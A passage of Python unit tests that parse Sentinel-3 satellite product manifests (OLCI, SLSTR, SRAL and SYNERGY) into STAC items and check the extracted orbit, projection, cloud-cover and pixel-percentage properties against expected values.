self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_olci_2_wfr_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_OL_2_WFR____20201006T012547_20201006T012847_20201007T100122_"
"0180_063_302_3060_MAR_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"invalidPixels_percentage":
item.properties["s3:invalidPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"dubiousSamples_percentage":
item.properties["s3:dubiousSamples_percentage"],
}
expected = {
"bbox": [117.198, -13.3386, 131.246, -0.122527],
"epsg": 4326,
"datetime": "2020-10-06T01:27:17.328426Z",
"orbit_state": "descending",
"absolute_orbit": 24145,
"relative_orbit": 302,
"cloud_cover": 51.0,
"shape": [4865, 4091],
"instrument": "OLCI",
"mode": "EO",
"productType": "OL_2_WFR___",
"salineWaterPixels_percentage": 41.0,
"coastalPixels_percentage": 0.010557,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 2.0,
"landPixels_percentage": 5.0,
"invalidPixels_percentage": 4.0,
"cosmeticPixels_percentage": 0.0,
"duplicatedPixels_percentage": 1.570717,
"saturatedPixels_percentage": 0.0,
"dubiousSamples_percentage": 2.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_1_rbt_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_1_RBT____20210827T074336_20210827T074636_20210827T094954_"
"0179_075_320_3060_LN2_O_NR_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [22.5729, -13.6378, 38.2488, -0.086826],
"epsg": 4326,
"datetime": "2021-08-27T07:45:05.980881Z",
"orbit_state": "descending",
"absolute_orbit": 28783,
"relative_orbit": 320,
"cloud_cover": 12.909653,
"shape": [1500, 1200],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_1_RBT___",
"salineWaterPixels_percentage": 0.0,
"landPixels_percentage": 100.0,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 6.677569,
"tidalRegionPixels_percentage": 0.0,
"cosmeticPixels_percentage": 27.02875,
"duplicatedPixels_percentage": 5.058438,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 14.225087,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_frp_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_FRP____20201104T001225_20201104T001525_20201105T060455_"
"0179_064_330_1800_LN2_O_NT_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-179.696, 59.3275, 179.51, 73.3617],
"epsg": 4326,
"datetime": "2020-11-04T00:13:54.939130Z",
"orbit_state": "descending",
"absolute_orbit": 24558,
"relative_orbit": 330,
"cloud_cover": 90.616444,
"shape": [1500, 1200],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_FRP___",
"salineWaterPixels_percentage": 16.259833,
"landPixels_percentage": 83.740167,
"coastalPixels_percentage": 0.110222,
"freshInlandWaterPixels_percentage": 2.344778,
"tidalRegionPixels_percentage": 0.256222,
"cosmeticPixels_percentage": 22.062722,
"duplicatedPixels_percentage": 5.217167,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 0.182278,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_lst_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_LST____20180104T004105_20180104T022205_20180930T071122_"
"6059_026_202______LR1_R_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-178.494, -85.7857, 176.014, 89.8585],
"epsg": 4326,
"datetime": "2018-01-04T01:31:35.029797Z",
"orbit_state": "ascending",
"absolute_orbit": 9800,
"relative_orbit": 202,
"cloud_cover": 73.828503,
"shape": [1500, 40396],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_LST___",
"salineWaterPixels_percentage": 63.373017,
"landPixels_percentage": 36.626983,
"coastalPixels_percentage": 0.125689,
"freshInlandWaterPixels_percentage": 0.818881,
"tidalRegionPixels_percentage": 0.642805,
"cosmeticPixels_percentage": 23.04911,
"duplicatedPixels_percentage": 5.590684,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 0.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_wst_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_WST____20190505T045344_20190505T063444_20190506T134130_"
"6059_044_204______MAR_O_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-178.8, -85.9058, 170.226, 89.0387],
"epsg": 4326,
"datetime": "2019-05-05T05:44:14.154220Z",
"orbit_state": "descending",
"absolute_orbit": 16732,
"relative_orbit": 204,
"cloud_cover": 63.849162,
"shape": [1500, 40396],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_WST___",
"salineWaterPixels_percentage": 67.822984,
"landPixels_percentage": 32.177016,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 0.0,
"cosmeticPixels_percentage": 42.348152,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 25.145676,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_sral_2_lan_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SR_2_LAN____20201003T195855_20201003T204924_20201028T210401_"
"3029_063_270______LN3_O_NT_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"lrmModePercentage":
item.properties["s3:lrmModePercentage"],
"sarModePercentage":
item.properties["s3:sarModePercentage"],
"landPercentage":
item.properties["s3:landPercentage"],
"closedSeaPercentage":
item.properties["s3:closedSeaPercentage"],
"continentalIcePercentage":
item.properties["s3:continentalIcePercentage"],
"openOceanPercentage":
item.properties["s3:openOceanPercentage"],
}
expected = {
"bbox": [-72.2571, -81.4165, 120.308, 81.4178],
"epsg": 4326,
"datetime": "2020-10-03T20:24:09.317133Z",
"orbit_state": "ascending",
"absolute_orbit": 24113,
"relative_orbit": 270,
"instrument": "SRAL",
"mode": "EO",
"productType": "SR_2_LAN___",
"lrmModePercentage": 0.0,
"sarModePercentage": 100.0,
"landPercentage": 55.0,
"closedSeaPercentage": 0.0,
"continentalIcePercentage": 22.0,
"openOceanPercentage": 23.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_sral_2_wat_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SR_2_WAT____20190326T011836_20190326T020243_20190420T170416_"
"2647_043_017______MAR_O_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"lrmModePercentage":
item.properties["s3:lrmModePercentage"],
"sarModePercentage":
item.properties["s3:sarModePercentage"],
"landPercentage":
item.properties["s3:landPercentage"],
"closedSeaPercentage":
item.properties["s3:closedSeaPercentage"],
"continentalIcePercentage":
item.properties["s3:continentalIcePercentage"],
"openOceanPercentage":
item.properties["s3:openOceanPercentage"],
}
expected = {
"bbox": [-172.503, -65.9996, 179.499, 81.4155],
"epsg": 4326,
"datetime": "2019-03-26T01:40:39.237989Z",
"orbit_state": "descending",
"absolute_orbit": 16160,
"relative_orbit": 17,
"instrument": "SRAL",
"mode": "EO",
"productType": "SR_2_WAT___",
"lrmModePercentage": 0.0,
"sarModePercentage": 100.0,
"landPercentage": 3.0,
"closedSeaPercentage": 0.0,
"continentalIcePercentage": 0.0,
"openOceanPercentage": 97.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_aod_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SY_2_AOD____20201119T153545_20201119T162000_20201120T223531_"
"2655_065_168______LN2_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"]
}
expected = {
"bbox": [-178.594, -84.4117, 177.852, 61.9656],
"epsg": 4326,
"datetime": "2020-11-19T15:57:52.526511Z",
"orbit_state": "descending",
"absolute_orbit": 24781,
"relative_orbit": 168,
"cloud_cover": 78.520162,
"shape": [324, 4023],
"instrument": "SYNERGY",
"mode": "EO",
"productType": "SY_2_AOD___",
"salineWaterPixels_percentage": 73.501939,
"landPixels_percentage": 26.485775
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_syn_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SY_2_SYN____20190202T004600_20190202T004900_20190203T142947_"
"0179_041_045_2700_LN2_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"]
}
expected = {
"bbox": [130.373, 7.90436, 144.644, 20.9353],
"epsg": 4326,
"datetime": "2019-02-02T00:47:30.461765Z",
"orbit_state": "descending",
"absolute_orbit": 15418,
"relative_orbit": 45,
"cloud_cover": 39.446131,
"instrument": "SYNERGY",
"mode": "EO",
"productType": "SY_2_SYN___",
"salineWaterPixels_percentage": 95.649619,
"coastalPixels_percentage": 0.004361,
"freshInlandWaterPixels_percentage": 3e-05,
"tidalRegionPixels_percentage": 0.0,
"landPixels_percentage": 0.005341
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_v10_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SY_2_V10____20191216T110000_20191226T110000_20200105T114106_"
"ASIAN_ISLANDS_____LN2_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%SZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"snowOrIcePixels_percentage":
item.properties["s3:snowOrIcePixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"]
}
expected = {
"bbox": [92.0045, -11.9955, 169.996, 28.9955],
"epsg": 4326,
"datetime": "2019-12-21T11:00:00Z",
"orbit_state": "descending",
"absolute_orbit": 19931,
"relative_orbit": 323,
"cloud_cover": 4.358878,
"instrument": "SYNERGY",
"mode": "EO",
"productType": "SY_2_V10___",
"snowOrIcePixels_percentage": 0.027358,
"landPixels_percentage": 18.263485
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_vg1_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SY_2_VG1____20200609T120000_20200610T120000_20200615T121610_"
"CENTRAL_AMERICA___LN2_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%SZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"snowOrIcePixels_percentage":
item.properties["s3:snowOrIcePixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"]
}
expected = {
"bbox": [-124.991, 3.60956e-12, -50.0, 49.9911],
"epsg": 4326,
"datetime": "2020-06-10T00:00:00Z",
"orbit_state": "ascending",
"absolute_orbit": 22455,
"relative_orbit": 152,
"cloud_cover": 9.465587,
"instrument": "SYNERGY",
"mode": "EO",
"productType": "SY_2_VG1___",
"snowOrIcePixels_percentage": 0.066818,
"landPixels_percentage": 22.527562
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_vgp_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3B_SY_2_VGP____20210213T192726_20210213T201112_20210215T060438_"
"2626_049_099______LN2_O_NT_002.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"snowOrIcePixels_percentage":
item.properties["s3:snowOrIcePixels_percentage"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"coastalPixelss_percentage":
item.properties["s3:coastalPixelss_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"]
}
expected = {
"bbox": [-179.336, -84.0126, 179.986, 68.7507],
"epsg": 4326,
"datetime": "2021-02-13T19:49:19.044416Z",
"orbit_state": "descending",
